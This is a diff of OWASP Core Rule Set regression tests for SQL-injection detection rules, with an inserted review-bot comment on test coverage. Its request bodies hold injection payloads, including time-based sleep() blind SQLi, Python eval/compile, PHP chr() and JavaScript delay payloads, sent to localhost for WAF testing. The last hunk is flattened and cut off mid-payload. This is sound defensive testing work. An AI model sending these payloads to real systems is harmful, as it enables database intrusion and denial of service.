+ uri: "/post"
+ data: "a='1' not regexp '2'"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 7
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- uri: "/post"
- data: "a='1' not regexp '1'"
- version: HTTP/1.1
- output:
- no_log_contains: id "942131"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/post"
+ data: "a='1' not regexp '1'"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942131]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
index e05f3f23c..421fedd10 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
@@ -1,295 +1,293 @@
 ---
 meta:
 author: "Christian S.J. Peron, Christoph Hansen, azurit"
- description: None
- enabled: true
- name: 942140.yaml
+rule_id: 942140
 tests:
- - test_title: 942140-1
+ - test_id: 1
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?sql_table=pg_catalog"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?sql_table=pg_catalog"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 2
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "INFORMATION_SCHEMA"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "INFORMATION_SCHEMA"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 3
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "database("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "database("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 4
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "db_name("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "db_name("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 5
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "DaTaBasE("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "DaTaBasE("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 6
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "InFoRmaTioN_ScHemA"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "InFoRmaTioN_ScHemA"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 7
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "DB_NAME("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "DB_NAME("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 8
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "tempdb"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "tempdb"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 9
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "msdb"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "msdb"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 10
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "mysql.db"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-11
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "mysql.db"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 11
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "MSysAccessObjects"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-12
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "MSysAccessObjects"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 12
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "Northwind"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-13
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "Northwind"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 13
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "northwind"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-14
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "northwind"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 14
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "SCHEMA_NAME"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-15
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "SCHEMA_NAME"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 15
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "DATABASE("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-16
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "DATABASE("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 16
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "schema_name"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-17
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "schema_name"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 17
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "information_schema"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "information_schema"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
index c13060656..9f3347554 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
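Review bot: All 17 migrated entries in this hunk assert `expect_ids: [942140]` and the file keeps no `no_expect_ids` case, so a regression that made the rule fire on ordinary words containing one of these tokens (several of the payloads — `tempdb`, `msdb`, `northwind`, `schema_name` — are plain identifiers) would not be caught by this suite; whether the rule's pattern is word-bounded is not visible here. A single negative test posting benign text that does not contain any of the listed names, with `no_expect_ids: [942140]`, would pin the false-positive side the way the 942130 and 942131 files do. Separately, tests 2, 6 and 17 and tests 12 and 13 exercise case variants of the same name but share the identical description, so the intent only survives by reading the `data` line; a description such as `desc: "Common DB Names Detected - mixed-case information_schema"` on test 6 would make the case-insensitivity coverage explicit.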
@@ -2,328 +2,327 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942150.yaml +rule_id: 942150 tests: - - test_title: 942150-1 + - test_id: 1 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: 
HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 7 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=None')and (select*from(select(sleep(10)))a)--" 
+ version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 8 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 9 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 10 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 11 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 12 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 13 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 14 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 15 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+(function(){if(typeof 